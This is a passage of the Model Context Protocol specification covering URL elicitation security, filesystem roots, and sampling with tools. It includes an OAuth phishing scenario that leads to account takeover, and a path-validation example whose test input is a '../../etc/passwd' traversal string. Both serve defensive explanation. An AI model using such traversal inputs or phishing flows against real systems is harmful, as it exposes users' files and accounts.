4. The user completes the OAuth flow directly with the third-party authorization server
5. The third-party authorization server redirects back to the MCP server
6. The MCP server securely stores the third-party tokens, bound to the user's identity
7. Future MCP requests can leverage these stored tokens for API access to the third-party resource server
The following is a non-normative example of how this pattern could be implemented:
```mermaid theme={null}
sequenceDiagram
participant User
participant UserAgent as User Agent (Browser)
participant 3AS as 3rd Party AS
participant 3RS as 3rd Party RS
participant Client as MCP Client
participant Server as MCP Server
Client->>Server: tools/call
Note over Server: Needs 3rd-party authorization for user
Note over Server: Store state (bind the elicitation request to the user)
Server->>Client: URLElicitationRequiredError (mode: "url", url: "https://mcp.example.com/connect?...")
Note over Client: Client notes the tools/call request can be retried later
Client->>User: Present consent to open URL
User->>Client: Provide consent
Client->>UserAgent: Open URL
Client->>Server: Accept response
UserAgent->>Server: Load connect route
Note over Server: Confirm: user is logged into MCP Server or MCP AS<br/>Confirm: elicitation user matches session user
Server->>UserAgent: Redirect to third-party authorization endpoint
UserAgent->>3AS: Load authorize route
Note over 3AS,User: User interaction (OAuth flow): User consents to scoped MCP Server access
3AS->>UserAgent: redirect to MCP Server's redirect_uri
UserAgent->>Server: load redirect_uri page
Note over Server: Confirm: redirect_uri belongs to MCP Server
Server->>3AS: Exchange authorization code for OAuth tokens
3AS->>Server: Grants tokens
Note over Server: Bind tokens to MCP user identity
Server-->>Client: notifications/elicitation/complete (optional)
Client->>Server: Retry tools/call
Note over Server: Retrieve token bound to user identity
Server->>3RS: Call 3rd-party API
```
This pattern maintains clear security boundaries while enabling rich integrations with third-party services that require user authorization.
## Error Handling
Servers **MUST** return standard JSON-RPC errors for common failure cases:
* When a request cannot be processed until an elicitation is completed: `-32042` (`URLElicitationRequiredError`)
Clients **MUST** return standard JSON-RPC errors for common failure cases:
* Server sends an `elicitation/create` request with a mode not declared in client capabilities: `-32602` (Invalid params)
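For instance, a client might reject an `elicitation/create` request whose mode it never declared; a non-normative sketch (recall that `mode` defaults to `"form"` when omitted):
```typescript theme={null}
// Non-normative sketch of the client-side capability check.
const declaredModes = new Set(["form"]); // taken from this client's own capabilities

function checkElicitationMode(params: { mode?: string }) {
  const mode = params.mode ?? "form"; // form mode requests may omit `mode`
  if (!declaredModes.has(mode)) {
    // Returned to the server as a standard JSON-RPC error response.
    return { code: -32602, message: `Elicitation mode "${mode}" not declared in client capabilities` };
  }
  return null; // capability declared: proceed with the request
}
```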
## Security Considerations
1. Servers **MUST** bind elicitation requests to the client and user identity
2. Clients **MUST** provide clear indication of which server is requesting information
3. Clients **SHOULD** implement user approval controls
4. Clients **SHOULD** allow users to decline elicitation requests at any time
5. Clients **SHOULD** implement rate limiting
6. Clients **SHOULD** present elicitation requests in a way that makes it clear what information is being requested and why
### Safe URL Handling
MCP servers requesting elicitation:
1. **MUST NOT** include sensitive information about the end-user, including credentials, personal identifiable information, etc., in the URL sent to the client in a URL elicitation request.
2. **MUST NOT** provide a URL which is pre-authenticated to access a protected resource, as the URL could be used to impersonate the user by a malicious client.
3. **SHOULD NOT** include URLs intended to be clickable in any field of a form mode elicitation request.
4. **SHOULD** use HTTPS URLs for non-development environments.
These server requirements ensure that client implementations have clear rules about when to present a URL to the user, so that the client-side rules (below) can be consistently applied.
Clients implementing URL mode elicitation **MUST** handle URLs carefully to prevent users from unknowingly clicking malicious links.
When handling URL mode elicitation requests, MCP clients:
1. **MUST NOT** automatically pre-fetch the URL or any of its metadata.
2. **MUST NOT** open the URL without explicit consent from the user.
3. **MUST** show the full URL to the user for examination before consent.
4. **MUST** open the URL provided by the server in a secure manner that does not enable the client or LLM to inspect the content or user inputs.
For example, on iOS, [SFSafariViewController](https://developer.apple.com/documentation/safariservices/sfsafariviewcontroller) is good, but [WKWebView](https://developer.apple.com/documentation/webkit/wkwebview) is not.
5. **SHOULD** highlight the domain of the URL to mitigate subdomain spoofing.
6. **SHOULD** have warnings for ambiguous/suspicious URIs (i.e., containing Punycode).
7. **SHOULD NOT** render URLs as clickable in any field of an elicitation request, except for the `url` field in a URL elicitation request (with the restrictions detailed above).
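As a non-normative illustration of rules 3, 5, and 6, a client might derive the display string and warnings for a URL elicitation like this (UI integration is left out):
```typescript theme={null}
// Non-normative sketch of client-side checks before asking for consent.
function describeElicitationUrl(raw: string): { display: string; warnings: string[] } {
  const url = new URL(raw); // throws on malformed input
  const warnings: string[] = [];
  if (url.protocol !== "https:") {
    warnings.push("URL is not served over HTTPS");
  }
  // Punycode labels (xn--) can disguise look-alike domains.
  if (url.hostname.split(".").some((label) => label.startsWith("xn--"))) {
    warnings.push("Domain contains Punycode and may be spoofed");
  }
  // Show the full URL, with the domain called out for the user to examine.
  return { display: `${url.href} (domain: ${url.hostname})`, warnings };
}
```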
### Identifying the User
Servers **MUST NOT** rely on client-provided user identification without server verification, as this can be forged.
Instead, servers **SHOULD** follow [security best practices](../basic/security_best_practices).
Non-normative examples:
* Incorrect: Treat user input like "I am [joe@example.com](mailto:joe@example.com)" as authoritative
* Correct: Rely on [authorization](../basic/authorization) to identify the user
### Form Mode Security
1. Servers **MUST NOT** request sensitive information (passwords, API keys, etc.) via form mode
2. Clients **SHOULD** validate all responses against the provided schema
3. Servers **SHOULD** validate received data matches the requested schema
### Phishing
URL mode elicitation returns a URL that an attacker can use to send to a victim. The MCP Server **MUST** verify the identity of the user who opens the URL before accepting information.
Typically identity verification is done by leveraging the [MCP authorization server](../basic/authorization) to identify the user, through a session cookie or equivalent in the browser.
For example, URL mode elicitation may be used to perform OAuth flows where the server acts as an OAuth client of another resource server. Without proper mitigation, the following phishing attack is possible:
1. A malicious user (Alice) connected to a benign server triggers an elicitation request
2. The benign server generates an authorization URL, acting as an OAuth client of a third-party authorization server
3. Alice's client displays the URL and asks for consent
4. Instead of clicking on the link, Alice tricks a victim user (Bob) of the same benign server into clicking it
5. Bob opens the link and completes the authorization, thinking they are authorizing their own connection to the benign server
6. The benign server receives a callback/redirect from the third-party authorization server, and assumes it's Alice's request
7. The tokens for the third-party server are bound to Alice's session and identity, instead of Bob's, resulting in an account takeover
To prevent this attack, the server **MUST** ensure that the user who started the elicitation request (the end-user who is accessing the server via the MCP client) is the same user who completes the authorization flow.
There are many ways to achieve this and the best way will depend on the specific implementation.
As a common, non-normative example, consider a case where the MCP server is accessible via the web and desires to perform a third-party authorization code flow.
To prevent the phishing attack, the server would create a URL mode elicitation to `https://mcp.example.com/connect?elicitationId=...` rather than the third-party authorization endpoint.
This "connect URL" must ensure the user who opened the page is the same user who the elicitation was generated for.
It would, for example, check that the user has a valid session cookie and that the session cookie is for the same user who was using the MCP client to generate the URL mode elicitation.
This could be done by comparing the authoritative subject (`sub` claim) from the MCP server's authorization server to the subject from the session cookie.
Once that page ensures the same user, it can send the user to the third-party authorization server at `https://example.com/authorize?...` where a normal OAuth flow can be completed.
In other cases, the server may not be accessible via the web and may not be able to use a session cookie to identify the user.
In this case, the server must use a different mechanism to verify that the user who opens the elicitation URL is the same user for whom the elicitation was generated.
In all implementations, the server **MUST** ensure that the mechanism to determine the user's identity is resilient to attacks where an attacker can modify the elicitation URL.
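A non-normative TypeScript sketch of such a connect route; `getSessionSub`, `getElicitationSub`, and `thirdPartyAuthorizeUrl` are hypothetical helpers:
```typescript theme={null}
// Non-normative sketch of the "connect URL" identity check described above.
// The declared helpers are hypothetical stand-ins for real implementations.
declare function getSessionSub(req: Request): Promise<string | null>;            // from session cookie
declare function getElicitationSub(elicitationId: string): Promise<string | null>; // stored at creation
declare function thirdPartyAuthorizeUrl(elicitationId: string): string;

async function handleConnectRoute(req: Request): Promise<Response> {
  const elicitationId = new URL(req.url).searchParams.get("elicitationId");
  if (!elicitationId) return new Response("Missing elicitationId", { status: 400 });

  // Authoritative subject of the browser session, backed by the MCP
  // server's authorization server.
  const sessionSub = await getSessionSub(req);
  // Subject the elicitation was generated for, stored server-side when the
  // URL mode elicitation was created.
  const elicitationSub = await getElicitationSub(elicitationId);

  if (!sessionSub || sessionSub !== elicitationSub) {
    // A different (or anonymous) user opened the link: refuse, don't proceed.
    return new Response("Forbidden", { status: 403 });
  }
  // Same user confirmed: hand off to the third-party authorization server.
  return Response.redirect(thirdPartyAuthorizeUrl(elicitationId), 302);
}
```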
# Roots
Source: https://modelcontextprotocol.io/specification/2025-11-25/client/roots
**Protocol Revision**: 2025-11-25
The Model Context Protocol (MCP) provides a standardized way for clients to expose
filesystem "roots" to servers. Roots define the boundaries of where servers can operate
within the filesystem, allowing them to understand which directories and files they have
access to. Servers can request the list of roots from supporting clients and receive
notifications when that list changes.
## User Interaction Model
Roots in MCP are typically exposed through workspace or project configuration interfaces.
For example, implementations could offer a workspace/project picker that allows users to
select directories and files the server should have access to. This can be combined with
automatic workspace detection from version control systems or project files.
However, implementations are free to expose roots through any interface pattern that
suits their needs—the protocol itself does not mandate any specific user
interaction model.
## Capabilities
Clients that support roots **MUST** declare the `roots` capability during
[initialization](/specification/2025-11-25/basic/lifecycle#initialization):
```json theme={null}
{
"capabilities": {
"roots": {
"listChanged": true
}
}
}
```
`listChanged` indicates whether the client will emit notifications when the list of roots
changes.
## Protocol Messages
### Listing Roots
To retrieve roots, servers send a `roots/list` request:
**Request:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"method": "roots/list"
}
```
**Response:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"result": {
"roots": [
{
"uri": "file:///home/user/projects/myproject",
"name": "My Project"
}
]
}
}
```
### Root List Changes
When roots change, clients that support `listChanged` **MUST** send a notification:
```json theme={null}
{
"jsonrpc": "2.0",
"method": "notifications/roots/list_changed"
}
```
## Message Flow
```mermaid theme={null}
sequenceDiagram
participant Server
participant Client
Note over Server,Client: Discovery
Server->>Client: roots/list
Client-->>Server: Available roots
Note over Server,Client: Changes
Client--)Server: notifications/roots/list_changed
Server->>Client: roots/list
Client-->>Server: Updated roots
```
## Data Types
### Root
A root definition includes:
* `uri`: Unique identifier for the root. This **MUST** be a `file://` URI in the current
specification.
* `name`: Optional human-readable name for display purposes.
Example roots for different use cases:
#### Project Directory
```json theme={null}
{
"uri": "file:///home/user/projects/myproject",
"name": "My Project"
}
```
#### Multiple Repositories
```json theme={null}
[
{
"uri": "file:///home/user/repos/frontend",
"name": "Frontend Repository"
},
{
"uri": "file:///home/user/repos/backend",
"name": "Backend Repository"
}
]
```
## Error Handling
Clients **SHOULD** return standard JSON-RPC errors for common failure cases:
* Client does not support roots: `-32601` (Method not found)
* Internal errors: `-32603`
Example error:
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"error": {
"code": -32601,
"message": "Roots not supported",
"data": {
"reason": "Client does not have roots capability"
}
}
}
```
## Security Considerations
1. Clients **MUST**:
* Only expose roots with appropriate permissions
* Validate all root URIs to prevent path traversal
* Implement proper access controls
* Monitor root accessibility
2. Servers **SHOULD**:
* Handle cases where roots become unavailable
* Respect root boundaries during operations
* Validate all paths against provided roots
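For example, path validation against `file://` roots might look like this non-normative Node.js sketch:
```typescript theme={null}
import * as path from "node:path";
import { fileURLToPath } from "node:url";

// Non-normative sketch: reject any path that escapes all provided roots.
function isWithinRoots(candidate: string, rootUris: string[]): boolean {
  const resolved = path.resolve(candidate); // collapses ../ segments
  return rootUris.some((uri) => {
    const root = path.resolve(fileURLToPath(uri)); // roots are file:// URIs
    const relative = path.relative(root, resolved);
    // Inside the root iff the relative path never climbs out of it.
    return relative === "" || (!relative.startsWith("..") && !path.isAbsolute(relative));
  });
}

const roots = ["file:///home/user/projects/myproject"];
console.log(isWithinRoots("/home/user/projects/myproject/src/app.ts", roots));       // true
console.log(isWithinRoots("/home/user/projects/myproject/../../etc/passwd", roots)); // false
```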
## Implementation Guidelines
1. Clients **SHOULD**:
* Prompt users for consent before exposing roots to servers
* Provide clear user interfaces for root management
* Validate root accessibility before exposing
* Monitor for root changes
2. Servers **SHOULD**:
* Check for roots capability before usage
* Handle root list changes gracefully
* Respect root boundaries in operations
* Cache root information appropriately
# Sampling
Source: https://modelcontextprotocol.io/specification/2025-11-25/client/sampling
**Protocol Revision**: 2025-11-25
The Model Context Protocol (MCP) provides a standardized way for servers to request LLM
sampling ("completions" or "generations") from language models via clients. This flow
allows clients to maintain control over model access, selection, and permissions while
enabling servers to leverage AI capabilities—with no server API keys necessary.
Servers can request text, audio, or image-based interactions and optionally include
context from MCP servers in their prompts.
## User Interaction Model
Sampling in MCP allows servers to implement agentic behaviors, by enabling LLM calls to
occur *nested* inside other MCP server features.
Implementations are free to expose sampling through any interface pattern that suits
their needs—the protocol itself does not mandate any specific user interaction
model.
For trust & safety and security, there **SHOULD** always
be a human in the loop with the ability to deny sampling requests.
Applications **SHOULD**:
* Provide UI that makes it easy and intuitive to review sampling requests
* Allow users to view and edit prompts before sending
* Present generated responses for review before delivery
## Tools in Sampling
Servers can request that the client's LLM use tools during sampling by providing a `tools` array and optional `toolChoice` configuration in their sampling requests. This enables servers to implement agentic behaviors where the LLM can call tools, receive results, and continue the conversation - all within a single sampling request flow.
Clients **MUST** declare support for tool use via the `sampling.tools` capability in order to receive tool-enabled sampling requests, and servers **MUST NOT** send tool-enabled sampling requests to clients that have not declared this capability.
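A non-normative sketch of this gating on the server side, using capabilities captured during initialization:
```typescript theme={null}
// Non-normative sketch: only attach tools when the client declared support.
interface ClientCapabilities {
  sampling?: { tools?: object; context?: object };
}

function buildSamplingParams(caps: ClientCapabilities, tools: object[]) {
  const params: Record<string, unknown> = {
    messages: [{ role: "user", content: { type: "text", text: "What's the weather in Paris?" } }],
    maxTokens: 1000,
  };
  if (caps.sampling?.tools) {
    // sampling.tools declared: tool-enabled requests are allowed.
    params.tools = tools;
    params.toolChoice = { mode: "auto" };
  }
  // Otherwise the request is sent without tools (sending them would be an error).
  return params;
}
```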
## Capabilities
Clients that support sampling **MUST** declare the `sampling` capability during
[initialization](/specification/2025-11-25/basic/lifecycle#initialization):
**Basic sampling:**
```json theme={null}
{
"capabilities": {
"sampling": {}
}
}
```
**With tool use support:**
```json theme={null}
{
"capabilities": {
"sampling": {
"tools": {}
}
}
}
```
**With context inclusion support (soft-deprecated):**
```json theme={null}
{
"capabilities": {
"sampling": {
"context": {}
}
}
}
```
The `includeContext` parameter values `"thisServer"` and `"allServers"` are
soft-deprecated. Servers **SHOULD** avoid using these values (e.g. can just
omit `includeContext` since it defaults to `"none"`), and **SHOULD NOT** use
them unless the client declares `sampling.context` capability. These values
may be removed in future spec releases.
## Protocol Messages
### Creating Messages
To request a language model generation, servers send a `sampling/createMessage` request:
**Request:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"method": "sampling/createMessage",
"params": {
"messages": [
{
"role": "user",
"content": {
"type": "text",
"text": "What is the capital of France?"
}
}
],
"modelPreferences": {
"hints": [
{
"name": "claude-3-sonnet"
}
],
"intelligencePriority": 0.8,
"speedPriority": 0.5
},
"systemPrompt": "You are a helpful assistant.",
"maxTokens": 100
}
}
```
**Response:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"result": {
"role": "assistant",
"content": {
"type": "text",
"text": "The capital of France is Paris."
},
"model": "claude-3-sonnet-20240307",
"stopReason": "endTurn"
}
}
```
### Sampling with Tools
The following diagram illustrates the complete flow of sampling with tools, including the multi-turn tool loop:
```mermaid theme={null}
sequenceDiagram
participant Server
participant Client
participant User
participant LLM
Note over Server,Client: Initial request with tools
Server->>Client: sampling/createMessage (messages + tools)
Note over Client,User: Human-in-the-loop review
Client->>User: Present request for approval
User-->>Client: Approve/modify
Client->>LLM: Forward request with tools
LLM-->>Client: Response with tool_use (stopReason: "toolUse")
Client->>User: Present tool calls for review
User-->>Client: Approve tool calls
Client-->>Server: Return tool_use response
Note over Server: Execute tool(s)
Server->>Server: Run get_weather("Paris")<br/>Run get_weather("London")
Note over Server,Client: Continue with tool results
Server->>Client: sampling/createMessage (history + tool_results + tools)
Client->>User: Present continuation
User-->>Client: Approve
Client->>LLM: Forward with tool results
LLM-->>Client: Final text response (stopReason: "endTurn")
Client->>User: Present response
User-->>Client: Approve
Client-->>Server: Return final response
Note over Server: Server processes result (may continue conversation...)
```
To request LLM generation with tool use capabilities, servers include `tools` and optionally `toolChoice` in the request:
**Request (Server -> Client):**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"method": "sampling/createMessage",
"params": {
"messages": [
{
"role": "user",
"content": {
"type": "text",
"text": "What's the weather like in Paris and London?"
}
}
],
"tools": [
{
"name": "get_weather",
"description": "Get current weather for a city",
"inputSchema": {
"type": "object",
"properties": {
"city": {
"type": "string",
"description": "City name"
}
},
"required": ["city"]
}
}
],
"toolChoice": {
"mode": "auto"
},
"maxTokens": 1000
}
}
```
**Response (Client -> Server):**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"result": {
"role": "assistant",
"content": [
{
"type": "tool_use",
"id": "call_abc123",
"name": "get_weather",
"input": {
"city": "Paris"
}
},
{
"type": "tool_use",
"id": "call_def456",
"name": "get_weather",
"input": {
"city": "London"
}
}
],
"model": "claude-3-sonnet-20240307",
"stopReason": "toolUse"
}
}
```
### Multi-turn Tool Loop
After receiving tool use requests from the LLM, the server typically:
1. Executes the requested tool uses.
2. Sends a new sampling request with the tool results appended
3. Receives the LLM's response (which might contain new tool uses)
4. Repeats as many times as needed (server might cap the maximum number of iterations, and e.g. pass `toolChoice: {mode: "none"}` on the last iteration to force a final result)
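A non-normative sketch of this loop from the server's perspective; `createMessage` stands in for issuing `sampling/createMessage` over the transport, `executeTool` is a hypothetical local dispatcher, and the assistant `content` is assumed to be normalized to an array:
```typescript theme={null}
// Non-normative sketch of the server-side tool loop with an iteration cap.
declare function createMessage(params: object): Promise<{
  role: "assistant";
  content: Array<{ type: string; id?: string; name?: string; input?: unknown }>;
  stopReason?: string;
}>;
declare function executeTool(name: string, input: unknown): Promise<string>;

async function runToolLoop(messages: object[], tools: object[], maxIterations = 5) {
  for (let i = 0; i < maxIterations; i++) {
    const result = await createMessage({
      messages,
      tools,
      // Force a final text answer on the last allowed iteration.
      toolChoice: { mode: i === maxIterations - 1 ? "none" : "auto" },
      maxTokens: 1000,
    });
    messages.push({ role: result.role, content: result.content });
    if (result.stopReason !== "toolUse") return result; // final answer reached

    // Resolve every tool_use with a matching tool_result, and nothing else.
    const uses = result.content.filter((c) => c.type === "tool_use");
    const toolResults = await Promise.all(
      uses.map(async (use) => ({
        type: "tool_result",
        toolUseId: use.id,
        content: [{ type: "text", text: await executeTool(use.name!, use.input) }],
      })),
    );
    messages.push({ role: "user", content: toolResults });
  }
  throw new Error("Tool loop exceeded iteration limit");
}
```
The concrete JSON-RPC messages exchanged in one such iteration look like this: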
**Follow-up request (Server -> Client) with tool results:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 2,
"method": "sampling/createMessage",
"params": {
"messages": [
{
"role": "user",
"content": {
"type": "text",
"text": "What's the weather like in Paris and London?"
}
},
{
"role": "assistant",
"content": [
{
"type": "tool_use",
"id": "call_abc123",
"name": "get_weather",
"input": { "city": "Paris" }
},
{
"type": "tool_use",
"id": "call_def456",
"name": "get_weather",
"input": { "city": "London" }
}
]
},
{
"role": "user",
"content": [
{
"type": "tool_result",
"toolUseId": "call_abc123",
"content": [
{
"type": "text",
"text": "Weather in Paris: 18°C, partly cloudy"
}
]
},
{
"type": "tool_result",
"toolUseId": "call_def456",
"content": [
{
"type": "text",
"text": "Weather in London: 15°C, rainy"
}
]
}
]
}
],
"tools": [
{
"name": "get_weather",
"description": "Get current weather for a city",
"inputSchema": {
"type": "object",
"properties": {
"city": { "type": "string" }
},
"required": ["city"]
}
}
],
"maxTokens": 1000
}
}
```
**Final response (Client -> Server):**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 2,
"result": {
"role": "assistant",
"content": {
"type": "text",
"text": "Based on the current weather data:\n\n- **Paris**: 18°C and partly cloudy - quite pleasant!\n- **London**: 15°C and rainy - you'll want an umbrella.\n\nParis has slightly warmer and drier conditions today."
},
"model": "claude-3-sonnet-20240307",
"stopReason": "endTurn"
}
}
```
## Message Content Constraints
### Tool Result Messages
When a user message contains tool results (type: "tool\_result"), it **MUST** contain ONLY tool results. Mixing tool results with other content types (text, image, audio) in the same message is not allowed.
This constraint ensures compatibility with provider APIs that use dedicated roles for tool results (e.g., OpenAI's "tool" role, Gemini's "function" role).
**Valid - single tool result:**
```json theme={null}
{
"role": "user",
"content": {
"type": "tool_result",
"toolUseId": "call_123",
"content": [{ "type": "text", "text": "Result data" }]
}
}
```
**Valid - multiple tool results:**
```json theme={null}
{
"role": "user",
"content": [
{
"type": "tool_result",
"toolUseId": "call_123",
"content": [{ "type": "text", "text": "Result 1" }]
},
{
"type": "tool_result",
"toolUseId": "call_456",
"content": [{ "type": "text", "text": "Result 2" }]
}
]
}
```
**Invalid - mixed content:**
```json theme={null}
{
"role": "user",
"content": [
{
"type": "text",
"text": "Here are the results:"
},
{
"type": "tool_result",
"toolUseId": "call_123",
"content": [{ "type": "text", "text": "Result data" }]
}
]
}
```
### Tool Use and Result Balance
When using tool use in sampling, every assistant message containing `ToolUseContent` blocks **MUST** be followed by a user message that consists entirely of `ToolResultContent` blocks, with each tool use (e.g. with `id: $id`) matched by a corresponding tool result (with `toolUseId: $id`), before any other message.
This requirement ensures:
* Tool uses are always resolved before the conversation continues
* Provider APIs can concurrently process multiple tool uses and fetch their results in parallel
* The conversation maintains a consistent request-response pattern
**Example valid sequence:**
1. User message: "What's the weather like in Paris and London?"
2. Assistant message: `ToolUseContent` (`id: "call_abc123", name: "get_weather", input: {city: "Paris"}`) + `ToolUseContent` (`id: "call_def456", name: "get_weather", input: {city: "London"}`)
3. User message: `ToolResultContent` (`toolUseId: "call_abc123", content: "18°C, partly cloudy"`) + `ToolResultContent` (`toolUseId: "call_def456", content: "15°C, rainy"`)
4. Assistant message: Text response comparing the weather in both cities
**Invalid sequence - missing tool result:**
1. User message: "What's the weather like in Paris and London?"
2. Assistant message: `ToolUseContent` (`id: "call_abc123", name: "get_weather", input: {city: "Paris"}`) + `ToolUseContent` (`id: "call_def456", name: "get_weather", input: {city: "London"}`)
3. User message: `ToolResultContent` (`toolUseId: "call_abc123", content: "18°C, partly cloudy"`) ← Missing result for call\_def456
4. Assistant message: Text response (invalid - not all tool uses were resolved)
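A non-normative sketch of validating both constraints (complete resolution, and tool-results-only follow-up messages) before forwarding a request:
```typescript theme={null}
// Non-normative sketch: check tool use / tool result balance between an
// assistant message and the user message that follows it.
type ContentBlock =
  | { type: "tool_use"; id: string; name: string; input: unknown }
  | { type: "tool_result"; toolUseId: string; content: unknown[] }
  | { type: "text"; text: string };

function validateToolBalance(assistant: ContentBlock[], followUp: ContentBlock[]): void {
  const useIds = assistant
    .filter((b): b is Extract<ContentBlock, { type: "tool_use" }> => b.type === "tool_use")
    .map((b) => b.id);
  if (useIds.length === 0) return; // nothing to resolve

  // The follow-up user message must consist entirely of tool results...
  if (followUp.some((b) => b.type !== "tool_result")) {
    throw new Error("Tool results must not be mixed with other content types");
  }
  // ...and every tool use must be matched by a result with the same ID.
  const resultIds = new Set(
    followUp.map((b) => (b as Extract<ContentBlock, { type: "tool_result" }>).toolUseId),
  );
  for (const id of useIds) {
    if (!resultIds.has(id)) throw new Error(`Missing tool_result for tool use ${id}`);
  }
}
```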
## Cross-API Compatibility
The sampling specification is designed to work across multiple LLM provider APIs (Claude, OpenAI, Gemini, etc.). Key design decisions for compatibility:
### Message Roles
MCP uses two roles: "user" and "assistant".
Tool use requests are sent in CreateMessageResult with the "assistant" role.
Tool results are sent back in messages with the "user" role.
Messages with tool results cannot contain other kinds of content.
### Tool Choice Modes
`CreateMessageRequest.params.toolChoice` controls the tool use ability of the model:
* `{mode: "auto"}`: Model decides whether to use tools (default)
* `{mode: "required"}`: Model MUST use at least one tool before completing
* `{mode: "none"}`: Model MUST NOT use any tools
### Parallel Tool Use
MCP allows models to make multiple tool use requests in parallel (returning an array of `ToolUseContent`). All major provider APIs support this:
* **Claude**: Supports parallel tool use natively
* **OpenAI**: Supports parallel tool calls (can be disabled with `parallel_tool_calls: false`)
* **Gemini**: Supports parallel function calls natively
Implementations wrapping providers that support disabling parallel tool use MAY expose this as an extension, but it is not part of the core MCP specification.
## Message Flow
```mermaid theme={null}
sequenceDiagram
participant Server
participant Client
participant User
participant LLM
Note over Server,Client: Server initiates sampling
Server->>Client: sampling/createMessage
Note over Client,User: Human-in-the-loop review
Client->>User: Present request for approval
User-->>Client: Review and approve/modify
Note over Client,LLM: Model interaction
Client->>LLM: Forward approved request
LLM-->>Client: Return generation
Note over Client,User: Response review
Client->>User: Present response for approval
User-->>Client: Review and approve/modify
Note over Server,Client: Complete request
Client-->>Server: Return approved response
```
## Data Types
### Messages
Sampling messages can contain:
#### Text Content
```json theme={null}
{
"type": "text",
"text": "The message content"
}
```
#### Image Content
```json theme={null}
{
"type": "image",
"data": "base64-encoded-image-data",
"mimeType": "image/jpeg"
}
```
#### Audio Content
```json theme={null}
{
"type": "audio",
"data": "base64-encoded-audio-data",
"mimeType": "audio/wav"
}
```
### Model Preferences
Model selection in MCP requires careful abstraction since servers and clients may use
different AI providers with distinct model offerings. A server cannot simply request a
specific model by name since the client may not have access to that exact model or may
prefer to use a different provider's equivalent model.
To solve this, MCP implements a preference system that combines abstract capability
priorities with optional model hints:
#### Capability Priorities
Servers express their needs through three normalized priority values (0-1):
* `costPriority`: How important is minimizing costs? Higher values prefer cheaper models.
* `speedPriority`: How important is low latency? Higher values prefer faster models.
* `intelligencePriority`: How important are advanced capabilities? Higher values prefer
more capable models.
#### Model Hints
While priorities help select models based on characteristics, `hints` allow servers to
suggest specific models or model families:
* Hints are treated as substrings that can match model names flexibly
* Multiple hints are evaluated in order of preference
* Clients **MAY** map hints to equivalent models from different providers
* Hints are advisory—clients make final model selection
For example:
```json theme={null}
{
"hints": [
{ "name": "claude-3-sonnet" }, // Prefer Sonnet-class models
{ "name": "claude" } // Fall back to any Claude model
],
"costPriority": 0.3, // Cost is less important
"speedPriority": 0.8, // Speed is very important
"intelligencePriority": 0.5 // Moderate capability needs
}
```
The client processes these preferences to select an appropriate model from its available
options. For instance, if the client doesn't have access to Claude models but has Gemini,
it might map the sonnet hint to `gemini-1.5-pro` based on similar capabilities.
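A non-normative sketch of that selection logic; the available models and the equivalence table are illustrative only:
```typescript theme={null}
// Non-normative sketch of client-side model selection from advisory hints.
const availableModels = ["gemini-1.5-pro", "gemini-1.5-flash"];

// Illustrative mapping of hint substrings to equivalent local models.
const equivalents: Record<string, string> = { "claude-3-sonnet": "gemini-1.5-pro" };

function selectModel(hints?: { name?: string }[]): string {
  for (const hint of hints ?? []) {
    if (!hint.name) continue;
    // Hints are substrings matched flexibly against model names...
    const direct = availableModels.find((m) => m.includes(hint.name!));
    if (direct) return direct;
    // ...and MAY be mapped to equivalent models from other providers.
    const mapped = equivalents[hint.name];
    if (mapped) return mapped;
  }
  // No hint matched: fall back to priority-based selection (elided here).
  return availableModels[0];
}

console.log(selectModel([{ name: "claude-3-sonnet" }, { name: "claude" }])); // "gemini-1.5-pro"
```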
## Error Handling
Clients **SHOULD** return errors for common failure cases:
* User rejected sampling request: `-1`
* Tool result missing in request: `-32602` (Invalid params)
* Tool results mixed with other content: `-32602` (Invalid params)
Example errors:
```json theme={null}
{
"jsonrpc": "2.0",
"id": 3,
"error": {
"code": -1,
"message": "User rejected sampling request"
}
}
```
```json theme={null}
{
"jsonrpc": "2.0",
"id": 4,
"error": {
"code": -32602,
"message": "Tool result missing in request"
}
}
```
## Security Considerations
1. Clients **SHOULD** implement user approval controls
2. Both parties **SHOULD** validate message content
3. Clients **SHOULD** respect model preference hints
4. Clients **SHOULD** implement rate limiting
5. Both parties **MUST** handle sensitive data appropriately
When tools are used in sampling, additional security considerations apply:
6. Servers **MUST** ensure that when replying to a `stopReason: "toolUse"`, each `ToolUseContent` item is responded to with a `ToolResultContent` item with a matching `toolUseId`, and that the user message contains only tool results (no other content types)
7. Both parties **SHOULD** implement iteration limits for tool loops
# Specification
Source: https://modelcontextprotocol.io/specification/2025-11-25/index
[Model Context Protocol](https://modelcontextprotocol.io) (MCP) is an open protocol that
enables seamless integration between LLM applications and external data sources and
tools. Whether you're building an AI-powered IDE, enhancing a chat interface, or creating
custom AI workflows, MCP provides a standardized way to connect LLMs with the context
they need.
This specification defines the authoritative protocol requirements, based on the
TypeScript schema in
[schema.ts](https://github.com/modelcontextprotocol/specification/blob/main/schema/2025-11-25/schema.ts).
For implementation guides and examples, visit
[modelcontextprotocol.io](https://modelcontextprotocol.io).
The key words "MUST", "MUST NOT", "REQUIRED", "SHALL", "SHALL NOT", "SHOULD", "SHOULD
NOT", "RECOMMENDED", "NOT RECOMMENDED", "MAY", and "OPTIONAL" in this document are to be
interpreted as described in [BCP 14](https://datatracker.ietf.org/doc/html/bcp14)
\[[RFC2119](https://datatracker.ietf.org/doc/html/rfc2119)]
\[[RFC8174](https://datatracker.ietf.org/doc/html/rfc8174)] when, and only when, they
appear in all capitals, as shown here.
## Overview
MCP provides a standardized way for applications to:
* Share contextual information with language models
* Expose tools and capabilities to AI systems
* Build composable integrations and workflows
The protocol uses [JSON-RPC](https://www.jsonrpc.org/) 2.0 messages to establish
communication between:
* **Hosts**: LLM applications that initiate connections
* **Clients**: Connectors within the host application
* **Servers**: Services that provide context and capabilities
MCP takes some inspiration from the
[Language Server Protocol](https://microsoft.github.io/language-server-protocol/), which
standardizes how to add support for programming languages across a whole ecosystem of
development tools. In a similar way, MCP standardizes how to integrate additional context
and tools into the ecosystem of AI applications.
## Key Details
### Base Protocol
* [JSON-RPC](https://www.jsonrpc.org/) message format
* Stateful connections
* Server and client capability negotiation
### Features
Servers offer any of the following features to clients:
* **Resources**: Context and data, for the user or the AI model to use
* **Prompts**: Templated messages and workflows for users
* **Tools**: Functions for the AI model to execute
